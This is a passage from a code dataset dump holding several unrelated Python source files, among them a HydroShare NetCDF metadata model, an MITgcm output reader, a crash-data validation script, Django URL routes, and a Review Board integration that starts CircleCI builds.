verbose_name='long name')\n method = models.TextField(null=True, blank=True, verbose_name='comment')\n missing_value = models.CharField(max_length=1000, null=True, blank=True)\n\n def __unicode__(self):\n return self.name\n\n @classmethod\n def remove(cls, element_id):\n raise ValidationError(\"The variable of the resource can't be deleted.\")\n\n\n# Define the netCDF resource\nclass NetcdfResource(BaseResource):\n objects = ResourceManager(\"NetcdfResource\")\n\n @property\n def metadata(self):\n md = NetcdfMetaData()\n return self._get_metadata(md)\n\n @classmethod\n def get_supported_upload_file_types(cls):\n # 3 file types are supported\n return (\".nc\",)\n\n @classmethod\n def allow_multiple_file_upload(cls):\n # can upload only 1 file\n return False\n\n @classmethod\n def can_have_multiple_files(cls):\n # can have only 1 file\n return False\n\n # add resource-specific HS terms\n def get_hs_term_dict(self):\n # get existing hs_term_dict from base class\n hs_term_dict = super(NetcdfResource, self).get_hs_term_dict()\n # add new terms for NetCDF res\n hs_term_dict[\"HS_NETCDF_FILE_NAME\"] = \"\"\n for res_file in self.files.all():\n _, f_fullname, f_ext = get_resource_file_name_and_extension(res_file)\n if f_ext.lower() == '.nc':\n hs_term_dict[\"HS_NETCDF_FILE_NAME\"] = f_fullname\n break\n return hs_term_dict\n\n class Meta:\n verbose_name = 'Multidimensional (NetCDF)'\n proxy = True\n\nprocessor_for(NetcdfResource)(resource_processor)\n\n\n# define the netcdf metadata\nclass NetcdfMetaData(CoreMetaData):\n variables = GenericRelation(Variable)\n ori_coverage = GenericRelation(OriginalCoverage)\n\n @classmethod\n def get_supported_element_names(cls):\n # get the names of all core metadata elements\n elements = super(NetcdfMetaData, cls).get_supported_element_names()\n # add the name of any additional element to the list\n elements.append('Variable')\n elements.append('OriginalCoverage')\n return elements\n\n @property\n def resource(self):\n return NetcdfResource.objects.filter(object_id=self.id).first()\n\n def has_all_required_elements(self):\n if not super(NetcdfMetaData, self).has_all_required_elements(): # check required meta\n return False\n if not self.variables.all():\n return False\n if not (self.coverages.all().filter(type='box').first() or\n self.coverages.all().filter(type='point').first()):\n return False\n return True\n\n def get_required_missing_elements(self): # show missing required meta\n missing_required_elements = super(NetcdfMetaData, self).get_required_missing_elements()\n if not (self.coverages.all().filter(type='box').first() or\n self.coverages.all().filter(type='point').first()):\n missing_required_elements.append('Spatial Coverage')\n if not self.variables.all().first():\n missing_required_elements.append('Variable')\n\n return missing_required_elements\n\n def get_xml(self, pretty_print=True):\n from lxml import etree\n # get the xml string representation of the core metadata elements\n xml_string = super(NetcdfMetaData, self).get_xml(pretty_print=pretty_print)\n\n # create an etree xml object\n RDF_ROOT = etree.fromstring(xml_string)\n\n # get root 'Description' element that contains all other elements\n container = RDF_ROOT.find('rdf:Description', namespaces=self.NAMESPACES)\n\n # inject netcdf resource specific metadata element 'variable' to container element\n for variable in self.variables.all():\n md_fields = {\n \"md_element\": \"netcdfVariable\",\n \"name\": \"name\",\n \"unit\": \"unit\",\n \"type\": \"type\",\n \"shape\": \"shape\",\n \"descriptive_name\": \"longName\",\n \"method\": \"comment\",\n \"missing_value\": \"missingValue\"\n } # element name : name in xml\n self.add_metadata_element_to_xml(container, variable, md_fields)\n\n if self.ori_coverage.all().first():\n ori_cov_obj = self.ori_coverage.all().first()\n hsterms_ori_cov = etree.SubElement(container, '{%s}spatialReference' %\n self.NAMESPACES['hsterms'])\n cov_term = '{%s}' + 'box'\n hsterms_coverage_terms = etree.SubElement(hsterms_ori_cov, cov_term %\n self.NAMESPACES['hsterms'])\n\n hsterms_ori_cov_rdf_Description = etree.SubElement(hsterms_coverage_terms, '{%s}value' %\n self.NAMESPACES['rdf'])\n cov_box = ''\n\n # add extent info\n if ori_cov_obj.value:\n cov_box = 'northlimit=%s; eastlimit=%s; southlimit=%s; westlimit=%s; unit=%s' \\\n % (ori_cov_obj.value['northlimit'], ori_cov_obj.value['eastlimit'],\n ori_cov_obj.value['southlimit'], ori_cov_obj.value['westlimit'],\n ori_cov_obj.value['units'])\n\n if ori_cov_obj.value.get('projection'):\n cov_box += '; projection_name={}'.format(ori_cov_obj.value['projection'])\n\n if ori_cov_obj.projection_string_text:\n cov_box += '; projection_string={}'.format(ori_cov_obj.projection_string_text)\n\n if ori_cov_obj.datum:\n cov_box += '; datum={}'.format(ori_cov_obj.datum)\n\n hsterms_ori_cov_rdf_Description.text = cov_box\n\n return etree.tostring(RDF_ROOT, pretty_print=pretty_print)\n\n def add_metadata_element_to_xml(self, root, md_element, md_fields):\n from lxml import etree\n element_name = md_fields.get('md_element') if md_fields.get('md_element') \\\n else md_element.term\n\n hsterms_newElem = etree.SubElement(\n root,\n \"{{{ns}}}{new_element}\".format(ns=self.NAMESPACES['hsterms'], new_element=element_name))\n\n hsterms_newElem_rdf_Desc = etree.SubElement(\n hsterms_newElem, \"{{{ns}}}Description\".format(ns=self.NAMESPACES['rdf']))\n\n for md_field in md_fields.keys():\n if hasattr(md_element, md_field):\n attr = getattr(md_element, md_field)\n if attr:\n field = etree.SubElement(hsterms_newElem_rdf_Desc,\n \"{{{ns}}}{field}\".format(ns=self.NAMESPACES['hsterms'],\n field=md_fields[md_field]))\n field.text = str(attr)\n\n def delete_all_elements(self):\n super(NetcdfMetaData, self).delete_all_elements()\n self.ori_coverage.all().delete()\n self.variables.all().delete()\n", "sub_path": "hs_app_netCDF/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 12687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "hs_core.models.AbstractMetaDataElement", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 59, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 65, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 72, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 98, "usage_type": "call"}, {"api_name": "hs_core.models.AbstractMetaDataElement", "line_number": 105, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 126, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 126, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 127, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 127, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 128, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 128, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 129, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 129, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 131, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 131, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 133, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 133, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 134, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 134, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 141, "usage_type": "call"}, {"api_name": "hs_core.models.BaseResource", "line_number": 145, "usage_type": "name"}, {"api_name": "hs_core.models.ResourceManager", "line_number": 146, "usage_type": "call"}, {"api_name": "hs_core.hydroshare.utils.get_resource_file_name_and_extension", "line_number": 175, "usage_type": "call"}, {"api_name": "hs_core.models.resource_processor", "line_number": 185, "usage_type": "argument"}, {"api_name": "mezzanine.pages.page_processors.processor_for", "line_number": 185, "usage_type": "call"}, {"api_name": "hs_core.models.CoreMetaData", "line_number": 189, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericRelation", "line_number": 190, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.fields.GenericRelation", "line_number": 191, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 232, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 232, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 253, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 253, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 256, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 256, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 259, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 259, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 281, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 281, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 288, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 288, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 292, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 292, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 299, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 299, "usage_type": "name"}]} +{"seq_id": "441666042", "text": "## READ LOW RESOLUTION MITGCM RUN\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom netCDF4 import Dataset as ncread\nimport glob\n\npath = '/home/jupiter/ocean/fenwick/baroclinic_gyre/baroclinic_128x128x4_uvTuvT_mk4/run_370/mnc_test_00'\n#loop over 13,14,15,16\n\nfiles = []\n\nfor folder in [13,14,15,16]:\n files.extend(glob.glob(path+str(folder)+'/state*.nc'))\n \nx = np.zeros((len(files),33))\ny = np.zeros((len(files),33))\n\n#get dimensions\n\nfor i,fil in zip(range(len(files)),files):\n dat = ncread(fil)\n x[i,:] = dat.variables['X'][:]\n y[i,:] = dat.variables['Y'][:]\n \n#read time only once\ntime = dat.variables['T'][:]\ndat.close()\nprint('Dimensions read.')\n\nx = np.sort(np.array(list(set([i for i in x.flatten()]))))\ny = np.sort(np.array(list(set([i for i in y.flatten()]))))\n\n## preallocate surface temperature\n# use only 3000 last time steps (due to spin up)\ntlength = 6000\ntemp = np.zeros((tlength,y.shape[0],x.shape[0]))\n\nfor i,fil in zip(range(len(files)),files):\n print('File no. '+str(i+1)+' of '+str(len(files)))\n dat = ncread(fil)\n datx = dat.variables['X'][:]\n daty = dat.variables['Y'][:]\n \n ys = np.where(y == daty[0])[0][0]\n xs = np.where(x == datx[0])[0][0]\n \n temp[:,ys:ys+daty.shape[0],xs:xs+datx.shape[0]]\\\n = dat.variables['Temp'][:][-tlength:,0,:,:]\n\n## get rid of boundaries\n#adapt dimensions\n# use only every other point in time to get daily resolution\n\nbx = 128\nby = 128\n\ntemp = temp[::2,:by,:bx]\ntime = time[-tlength::2]\ntime = (time - time[0])/24./3600.\n\ny = y[:by]\nx = x[:bx]\n\n## SAVE\n\nnp.save('python/gyres/temp_optlowres_sfc.npy',temp)\n#np.save('python/gyres/temp_lowres_dim.npy',(time,y,x))\nprint('Files written.')\n", "sub_path": "gyres_scripts/read_optlowres.py", "file_name": "read_optlowres.py", "file_ext": "py", "file_size_in_byte": 1693, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "glob.glob", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "netCDF4.Dataset", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "netCDF4.Dataset", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "67663115", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\n# Validation of assertions\n\nimport pandas as pd\nimport numpy as np\nimport math\n\ndf = pd.read_csv ('Downloads/oregon-crash2019.csv')\n\n\n# In[53]:\n\n\n# 41 to 46 Latitude Degrees\n\nfasle_records=0\nnan_records=0\nfor data in df['Latitude Degrees']:\n if (data<41 or data>46):\n fasle_records+=1\n elif math.isnan(data):\n nan_records+=1\n \nprint('fasle_records',fasle_records)\nprint('nan_records',nan_records)\n\n\n# In[7]:\n\n\n# 0 to 59 Latitude Minutes\n\nfasle_records=0\nnan_records=0\nfor data in df['Latitude Minutes']:\n if (data>=0 and data<=59):\n pass\n elif math.isnan(data):\n nan_records+=1\n else:\n fasle_records+=1\n \nprint('fasle_records',fasle_records)\nprint('nan_records',nan_records)\n\n\n# In[8]:\n\n\n# 0.00 to 59.99 Latitude Seconds\n\nfasle_records=0\nnan_records=0\n\nfor data in df['Latitude Seconds']:\n if (data>=0 and data<=59.99):\n pass\n elif math.isnan(data):\n nan_records+=1\n else:\n fasle_records+=1\n \nprint('false_records',fasle_records)\nprint('nan_records',nan_records)\n\n\n# In[9]:\n\n\n# A crash hour should be between 0-24\n\nfasle_records=0\nnan_records=0\n\nfor data in df['Crash Hour']:\n if (data>=0 and data<=24):\n pass\n elif math.isnan(data):\n nan_records+=1\n else:\n fasle_records+=1\n \nprint('false_records',fasle_records)\nprint('nan_records',nan_records)\n\n\n# In[27]:\n\n\n#On average, more crashes occur when the weather is clear.\nfrom collections import defaultdict\ndic=defaultdict(int)\nweather = {\n0: 'Unknown',\n1: 'Clear',\n2: 'Cloudy',\n3: \"Rain\",\n4: 'Sleet / Freezing Rain / Hail',\n5: 'Fog',\n6: 'Snow',\n7: 'Dust',\n8: 'Smoke',\n9: 'Ash'\n}\n\nfor data in df['Weather Condition']:\n if math.isnan(data):\n dic['nan_records']+=1\n else:\n dic[weather[data]]+=1\n \nprint(dic)\n\n\n# In[46]:\n\n\nfrom collections import defaultdict\ncount=defaultdict(int)\ndf1=list(zip(df['Weather Condition'], df['Road Surface Condition']))\nroad={\n0:'Unknown',\n1: 'Dry',\n2: 'Wet',\n3: 'Snow',\n4: 'Ice'\n}\n\nwrong_entries=0\nfor data in df1:\n if data[0]==1 and data[1] in road:\n count[road[data[1]]]+=1\n elif math.isnan(data[1]):\n pass\n elif data[1] not in road:\n wrong_entries+=1\n \nprint('wrong entries', wrong_entries)\n## Suprisingly more crashes occured when the when the weather condition is clear and road surface is dry (o_O)\nprint(str(dic['Clear'])+' crashes on clear weather condition with road surface condition: '+str([(i,dic[i]) for i in dic]))\n\n\n# In[38]:\n\n\n#All the crashes occurred during the day light.\nfrom collections import defaultdict\nlight=defaultdict(int)\nlight_condition = {0: 'Unknown',\n1: 'Daylight',\n2: 'Darkness',\n3: 'Darkness',\n4: 'Dawn (Twilight)',\n5: 'Dusk (Twilight)'}\n\nfor data in df['Light Condition']:\n if math.isnan(data):\n light['nan_records']+=1\n else:\n light[light_condition[data]]+=1\n \nprint(light)\n\n\n# In[52]:\n\n\n# Vehicle ID should be 7 digits\n\nfalse_entries=0\ncorrect_entries=0\nnan_entries=0\n\nfor data in df['Vehicle ID']:\n if math.isnan(data):\n nan_entries+=1\n else:\n if len(str(int(data)))==7:\n correct_entries+=1\n else:\n false_entries+=1\n \nprint('false_entries',false_entries)\nprint('correct_entries',correct_entries)\nprint('nan_entries',nan_entries)\n", "sub_path": "Data Validation/Validation_Code_Critique.py", "file_name": "Validation_Code_Critique.py", "file_ext": "py", "file_size_in_byte": 3384, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 26, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 43, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 63, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 83, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 97, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 112, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 124, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 138, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 153, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 162, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 180, "usage_type": "call"}]} +{"seq_id": "19530532", "text": "from django.urls import path\nfrom . import views\nfrom rest_framework_simplejwt import views as jwt_views\n\nurlpatterns = [\n path('signup/', views.UserCreate.as_view(), name='account-create'),\n path('login/', views.LoginView.as_view(), name='login'),\n path('token/refresh/', jwt_views.TokenRefreshView.as_view(), name='token-refresh'),\n\n path('post_create/', views.PostCreateApiView.as_view(), name='post-create'),\n path('post//like/', views.PostLikesUpdateApiView.as_view(), name='post-like'),\n path('post//dislike/', views.PostDisLikesUpdateApiView.as_view(), name='post-dislike'),\n\n path('analytics/', views.AnalyticsAPIView.as_view(), name='analytics'),\n path('user_analytics/', views.UserAnalyticsAPIView.as_view(), name='user-analytics')\n]\n", "sub_path": "api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 784, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rest_framework_simplejwt.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "621565992", "text": "\"\"\"Integration for building changes on CircleCI.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport json\nimport logging\n\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError, transaction\nfrom django.utils.functional import cached_property\nfrom django.utils.http import urlquote_plus\nfrom django.utils.six.moves.urllib.request import urlopen\nfrom djblets.avatars.services import URLAvatarService\nfrom djblets.siteconfig.models import SiteConfiguration\nfrom reviewboard.admin.server import get_server_url\nfrom reviewboard.avatars import avatar_services\nfrom reviewboard.extensions.hooks import SignalHook\nfrom reviewboard.integrations import Integration\nfrom reviewboard.reviews.models.status_update import StatusUpdate\nfrom reviewboard.reviews.signals import review_request_published\nfrom reviewboard.webapi.models import WebAPIToken\n\nfrom rbintegrations.circleci.forms import CircleCIIntegrationConfigForm\nfrom rbintegrations.util.urlrequest import URLRequest\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CircleCIIntegration(Integration):\n \"\"\"Integrates Review Board with CircleCI.\"\"\"\n\n name = 'CircleCI'\n description = 'Builds diffs posted to Review Board using CircleCI.'\n config_form_cls = CircleCIIntegrationConfigForm\n\n def initialize(self):\n \"\"\"Initialize the integration hooks.\"\"\"\n SignalHook(self, review_request_published,\n self._on_review_request_published)\n\n @cached_property\n def icon_static_urls(self):\n \"\"\"Return the icons used for the integration.\n\n Returns:\n dict:\n The icons for CircleCI.\n \"\"\"\n from rbintegrations.extension import RBIntegrationsExtension\n\n extension = RBIntegrationsExtension.instance\n\n return {\n '1x': extension.get_static_url('images/circleci/icon.png'),\n '2x': extension.get_static_url('images/circleci/icon@2x.png'),\n }\n\n def _on_review_request_published(self, sender, review_request,\n changedesc=None, **kwargs):\n \"\"\"Handle when a review request is published.\n\n Args:\n sender (object):\n The sender of the signal.\n\n review_request (reviewboard.reviews.models.review_request.\n ReviewRequest):\n The review request which was published.\n\n changedesc (reviewboard.changedescs.models.ChangeDescription,\n optional):\n The change description associated with this publish.\n\n **kwargs (dict):\n Additional keyword arguments.\n \"\"\"\n # Only build changes against GitHub or Bitbucket repositories.\n repository = review_request.repository\n\n if not repository or not repository.hosting_account:\n return\n\n service_name = repository.hosting_account.service_name\n\n if service_name not in ('github', 'bitbucket'):\n return\n\n diffset = review_request.get_latest_diffset()\n\n # Don't build any review requests that don't include diffs.\n if not diffset:\n return\n\n # If this was an update to a review request, make sure that there was a\n # diff update in it.\n if changedesc is not None:\n fields_changed = changedesc.fields_changed\n\n if ('diff' not in fields_changed or\n 'added' not in fields_changed['diff']):\n return\n\n matching_configs = [\n config\n for config in self.get_configs(review_request.local_site)\n if config.match_conditions(form_cls=self.config_form_cls,\n review_request=review_request)\n ]\n\n if not matching_configs:\n return\n\n # This may look weird, but it's here for defensive purposes.\n # Currently, the possible values for CircleCI's \"vcs-type\" field in\n # their API happens to match up perfectly with our service names,\n # but that's not necessarily always going to be the case.\n if service_name == 'github':\n vcs_type = 'github'\n elif service_name == 'bitbucket':\n vcs_type = 'bitbucket'\n else:\n raise ValueError('Unexpected hosting service type got through '\n 'to CircleCI invocation: %s'\n % service_name)\n\n org_name, repo_name = self._get_repo_ids(service_name, repository)\n\n user = self._get_or_create_user()\n\n for config in matching_configs:\n status_update = StatusUpdate.objects.create(\n service_id='circle-ci',\n user=user,\n summary='CircleCI',\n description='starting build...',\n state=StatusUpdate.PENDING,\n review_request=review_request,\n change_description=changedesc)\n\n url = ('https://circleci.com/api/v1.1/project/%s/%s/%s/tree/%s'\n '?circle-token=%s'\n % (vcs_type, org_name, repo_name,\n config.get('branch_name') or 'master',\n urlquote_plus(config.get('circle_api_token'))))\n\n logger.info('Making CircleCI API request: %s', url)\n\n local_site = config.local_site\n\n try:\n token = user.webapi_tokens.filter(local_site=local_site)[0]\n except IndexError:\n token = WebAPIToken.objects.generate_token(\n user, local_site=local_site, autogenerated=True)\n\n body = {\n 'revision': diffset.base_commit_id,\n 'build_parameters': {\n 'CIRCLE_JOB': 'reviewboard',\n 'REVIEWBOARD_SERVER':\n get_server_url(local_site=config.local_site),\n 'REVIEWBOARD_REVIEW_REQUEST': review_request.display_id,\n 'REVIEWBOARD_DIFF_REVISION': diffset.revision,\n 'REVIEWBOARD_API_TOKEN': token.token,\n 'REVIEWBOARD_STATUS_UPDATE_ID': status_update.pk,\n },\n }\n\n if config.local_site:\n body['build_parameters']['REVIEWBOARD_LOCAL_SITE'] = \\\n config.local_site.name\n\n request = URLRequest(\n url,\n body=json.dumps(body),\n headers={\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n },\n method='POST')\n\n u = urlopen(request)\n\n data = json.loads(u.read())\n\n status_update.url = data['build_url']\n status_update.url_text = 'View Build'\n status_update.save()\n\n def _get_repo_ids(self, service_name, repository):\n \"\"\"Return the organization and repo name for the given repository.\n\n Args:\n repository (reviewboard.scmtools.models.Repository):\n The repository.\n\n Returns:\n tuple of unicode:\n A two-tuple consisting of the organization (or user) and repository\n names.\n \"\"\"\n extra_data = repository.extra_data\n plan = extra_data['repository_plan']\n\n if service_name == 'github':\n if plan == 'public':\n return (extra_data['hosting_account_username'],\n extra_data['github_public_repo_name'])\n elif plan == 'public-org':\n return (extra_data['github_public_org_name'],\n extra_data['github_public_org_repo_name'])\n elif plan == 'private':\n return (extra_data['hosting_account_username'],\n extra_data['github_private_repo_name'])\n elif plan == 'private-org':\n return (extra_data['github_private_org_name'],\n extra_data['github_private_org_repo_name'])\n else:\n raise ValueError('Unexpected plan for GitHub repository %d: %s'\n % (repository.pk, plan))\n elif service_name == 'bitbucket':\n if plan == 'personal':\n return (extra_data['bitbucket_account_username'],\n extra_data['bitbucket_repo_name'])\n elif plan == 'other-user':\n return (extra_data['bitbucket_other_user_username'],\n extra_data['bitbucket_other_user_repo_name'])\n elif plan == 'team':\n return (extra_data['bitbucket_team_name'],\n extra_data['bitbucket_team_repo_name'])\n else:\n raise ValueError('Unexpected plan for Bitbucket repository '\n '%d: %s'\n % (repository.pk, plan))\n\n def _get_or_create_user(self):\n \"\"\"Return a user to use for CircleCI.\n\n Returns:\n django.contrib.auth.models.User:\n A user instance.\n \"\"\"\n try:\n return User.objects.get(username='circle-ci')\n except User.DoesNotExist:\n logger.info('Creating new user for CircleCI')\n siteconfig = SiteConfiguration.objects.get_current()\n noreply_email = siteconfig.get('mail_default_from')\n\n with transaction.atomic():\n try:\n user = User.objects.create(username='circle-ci',\n email=noreply_email,\n first_name='Circle',\n last_name='CI')\n except IntegrityError:\n # Another process/thread beat us to it.\n return User.objects.get(username='circle-ci')\n\n profile = user.get_profile()\n profile.should_send_email = False\n profile.save()\n\n avatar_service = avatar_services.get_avatar_service(\n URLAvatarService.avatar_service_id)\n # TODO: make somewhat higher-res versions for the main avatar.\n avatar_service.setup(user, self.icon_static_urls)\n\n return user\n", "sub_path": "rbintegrations/circleci/integration.py", "file_name": "integration.py", "file_ext": "py", "file_size_in_byte": 10288, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "reviewboard.integrations.Integration", "line_number": 30, "usage_type": "name"}, {"api_name": "rbintegrations.circleci.forms.CircleCIIntegrationConfigForm", "line_number": 35, "usage_type": "name"}, {"api_name": "reviewboard.extensions.hooks.SignalHook", "line_number": 39, "usage_type": "call"}, {"api_name": "reviewboard.reviews.signals.review_request_published", "line_number": 39, "usage_type": "argument"}, {"api_name": "rbintegrations.extension.RBIntegrationsExtension.instance", "line_number": 52, "usage_type": "attribute"}, {"api_name": "rbintegrations.extension.RBIntegrationsExtension", "line_number": 52, "usage_type": "name"}, {"api_name": "django.utils.functional.cached_property", "line_number": 42, "usage_type": "name"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate.objects.create", "line_number": 132, "usage_type": "call"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate", "line_number": 132, "usage_type": "name"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate.PENDING", "line_number": 137, "usage_type": "attribute"}, {"api_name": "reviewboard.reviews.models.status_update.StatusUpdate", "line_number": 137, "usage_type": "name"}, {"api_name": "django.utils.http.urlquote_plus", "line_number": 145, "usage_type": "call"}, {"api_name": "reviewboard.webapi.models.WebAPIToken.objects.generate_token", "line_number": 154, "usage_type": "call"}, {"api_name": "reviewboard.webapi.models.WebAPIToken.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "reviewboard.webapi.models.WebAPIToken", "line_number": 154, "usage_type": "name"}, {"api_name": "reviewboard.admin.server.get_server_url", "line_number": 162, "usage_type": "call"}, {"api_name": "rbintegrations.util.urlrequest.URLRequest", "line_number": 174, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 176, "usage_type": "call"}, {"api_name": "django.utils.six.moves.urllib.request.urlopen", "line_number": 183, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 185, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 245, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 245, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 245, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.DoesNotExist", "line_number": 246, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 246, "usage_type": "name"}, {"api_name": "djblets.siteconfig.models.SiteConfiguration.objects.get_current", "line_number": 248, "usage_type": "call"}, {"api_name": "djblets.siteconfig.models.SiteConfiguration.objects", "line_number": 248, "usage_type": "attribute"}, {"api_name": "djblets.siteconfig.models.SiteConfiguration", "line_number": 248, "usage_type": "name"}, {"api_name": "django.db.transaction.atomic", "line_number": 251, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 251, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 253, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 253, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 253, "usage_type": "name"}, {"api_name": "django.db.IntegrityError", "line_number": 257, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 259, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 259, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 259, "usage_type": "name"}, {"api_name": "reviewboard.avatars.avatar_services.get_avatar_service", "line_number": 265, "usage_type": "call"}, {"api_name": "reviewboard.avatars.avatar_services", "line_number": 265, "usage_type": "name"}, {"api_name": "djblets.avatars.services.URLAvatarService.avatar_service_id", "line_number": 266, "usage_type": "attribute"}, {"api_name": "djblets.avatars.services.URLAvatarService", "line_number": 266, "usage_type": "name"}]} +{"seq_id": "530727662", "text": "#!/usr/bin/env python3\r\n# coding: utf-8\r\n\r\nimport os\r\nimport grpc\r\nimport logging\r\nimport numpy as np\r\n\r\nimport jarvis_api.audio_pb2 as ja\r\nimport 